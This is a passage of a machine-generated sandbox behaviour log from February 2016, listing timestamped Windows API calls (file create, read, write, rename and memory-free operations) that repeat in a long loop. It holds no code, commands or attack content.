"2016-02-16 17:42:05,546", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,546", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,546", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:05,546", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,546", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,556", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,556", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,556", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,556", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,556", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,566", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,566", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,566", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,566", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,566", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,566", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,576", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,576", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,576", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,576", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,576", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,576", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,586", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,586", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,586", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,586", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,586", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,586", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,586", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,586", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,596", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,596", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,606", "api": 
"NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,606", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,606", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,606", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,606", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,606", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,616", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,616", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,616", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,616", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,616", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,616", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,616", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,627", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,627", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,627", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,627", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,627", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,627", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,637", "api": "NtFreeVirtualMemory"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:05,637", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,637", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,637", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,637", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,637", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,637", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,637", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,647", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,647", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,647", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,647", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,647", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,647", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,647", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,647", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,657", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,657", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,657", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,667", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,667", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,667", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,667", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,667", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,667", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,687", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,697", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,697", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,707", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,707", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,707", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,707", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,707", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,707", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,707", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,707", "api": "MoveFileWithProgressW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:05,717", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,717", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,717", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,717", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,717", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,717", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,717", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,717", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,727", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,727", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,727", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,727", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,727", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,727", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,727", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,727", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,737", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,737", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,737", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,737", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,737", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 
17:42:05,737", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,737", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,737", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,747", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,747", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,747", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,747", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,747", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,747", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,747", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,747", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,757", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,757", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,757", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,757", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,757", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,757", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,767", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,767", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,767", 
"api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,767", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,767", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,767", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,777", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,777", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,777", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,787", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,787", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,787", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,787", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,787", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,797", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,797", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,797", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,797", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,797", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,797", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,797", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,797", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,807", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,807", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,807", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,807", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,807", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,807", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,817", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,817", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,827", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,827", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,827", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,827", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,827", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,827", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,827", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,837", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:42:05,837", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,837", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,837", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,847", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,847", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,847", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,847", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,847", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,847", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,857", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,857", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,857", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,857", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,857", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,857", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,867", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,867", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:05,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,867", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,867", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,867", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,867", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,877", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,877", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,877", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,877", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,877", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,877", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,887", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,887", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,887", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,897", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,897", "api": "FindFirstFileExW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:05,897", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,897", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,897", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,897", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,907", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,907", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,907", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,907", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,907", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,917", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,917", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,927", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:05,927", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,927", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,927", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,927", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,937", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,937", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,937", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,937", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,947", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,947", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,947", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,947", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,947", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,957", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,957", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:05,957", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,957", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,957", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,957", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,967", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,967", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,967", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,967", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,967", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,967", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,977", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,977", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,987", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,987", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,997", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,997", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,997", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,997", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,997", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,007", "api": 